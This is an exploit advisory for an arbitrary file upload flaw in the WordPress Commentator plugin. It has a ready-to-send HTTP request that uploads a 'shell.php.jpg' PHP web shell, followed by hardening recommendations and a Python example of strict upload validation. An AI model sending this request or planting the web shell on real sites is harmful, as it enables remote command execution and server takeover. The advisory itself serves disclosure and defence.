################################################################################
# Exploit Title: WordPress Commentator Plugin - Arbitrary File Upload
# Date: 2026-02-05
# Exploit Author: Ahmad
# Category: Webapps
# Vulnerability Type: [CWE-434] Unrestricted Upload of File with Dangerous Type
################################################################################

[+] Description:

The "Commentator" plugin for WordPress contains an arbitrary file upload
vulnerability in the handler for the 'commentator_upload-image' AJAX action,
reached through /wp-admin/admin-ajax.php. The handler's extension filter can be
bypassed with a double extension such as .php.jpg: the name ends in an allowed
image extension, so the filter accepts it, but on servers whose PHP handler
mapping matches .php anywhere in the filename (for example Apache with mod_mime
and an AddHandler directive for .php) the stored file is executed as PHP,
giving Remote Code Execution (RCE). Whether the action is registered for
unauthenticated (wp_ajax_nopriv_) requests is not stated here; confirm that
before rating severity.

[+] Proof of Concept (PoC):

POST /wp-admin/admin-ajax.php HTTP/2
Host: TARGET_HOST
Content-Type: multipart/form-data; boundary=---------------------------219582655323612

-----------------------------219582655323612
Content-Disposition: form-data; name="action"

commentator_upload-image
-----------------------------219582655323612
Content-Disposition: form-data; name="upl"; filename="shell.php.jpg"
Content-Type: image/jpeg

<?php system($_GET['cmd']); ?>
-----------------------------219582655323612--

[+] Impact:

By executing arbitrary commands as the web server user, an attacker can take
full control of the web server, read sensitive data and modify the database.

[+] Recommendations:

- Validate uploads against a strict whitelist of image extensions, rejecting
  filenames that carry more than one extension, and check that the file
  content matches the type the extension claims.
- Rename uploaded files on the server side to a generated name that keeps only
  the validated extension, never the client-supplied name.
- Disable script execution in the upload directory (for Apache with mod_php,
  `RemoveHandler .php` or `php_flag engine off` in the directory's .htaccess;
  for nginx, never route the upload path to the PHP FastCGI backend).

[+] Thanks to:

- IdiotCrew
- L4663R666H05T

################################################################################
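The upload handling the recommendations describe, as an added Python example that is not code from the Commentator plugin or from this advisory: a naive last-extension check of the kind the double-extension trick defeats, placed next to a strict check that rejects any filename with more than one extension, a magic-byte check of the content, and server-side renaming. The function names, the whitelist, the magic-byte table and the sample payloads are assumptions made for the example.

```python
import os
import secrets

# Whitelist of extensions the upload endpoint accepts (assumption for the example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each allowed format, taken from the public file-format specs.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def _basename(filename: str) -> str:
    """Strip any directory part, treating backslashes as separators too."""
    return os.path.basename(filename.replace("\\", "/"))


def naive_extension_check(filename: str) -> bool:
    """The weak pattern the advisory describes: only the text after the last
    dot is compared against the whitelist, so 'shell.php.jpg' is accepted."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def strict_extension_check(filename: str) -> bool:
    """Accept only '<name>.<ext>' with exactly one whitelisted extension.
    Any extra dot (shell.php.jpg, shell.jpg.php, shell.php.) is rejected."""
    parts = _basename(filename).split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS


def content_matches_extension(data: bytes, ext: str) -> bool:
    """Check that the file body starts like the format its extension claims."""
    return data.startswith(MAGIC[ext])


def validate_and_rename(filename: str, data: bytes):
    """Apply all three recommendations. Returns the server-generated name to
    store the file under, or None if the upload must be rejected."""
    if not strict_extension_check(filename):
        return None
    ext = _basename(filename).rsplit(".", 1)[1].lower()
    if not content_matches_extension(data, ext):
        return None
    # Never reuse the client-supplied name: a random name with the validated
    # extension removes path tricks and any attacker control over the name.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: the advisory's payload and a minimal PNG header.
    webshell = b"<?php system($_GET['cmd']); ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    print(naive_extension_check("shell.php.jpg"))          # True: the bypass works
    print(strict_extension_check("shell.php.jpg"))         # False
    print(validate_and_rename("shell.php.jpg", webshell))  # None
    print(validate_and_rename("photo.png", png))           # random 32-hex name + .png
```

The magic-byte check stops the exact PoC body, but not a payload that prepends a valid JPEG header to PHP code, so it is a supporting control only. The strict single-extension check plus the server-side rename are what remove the double-extension vector, and the handler configuration in the upload directory (no PHP handler for that path) is what makes a file that slips through harmless anyway.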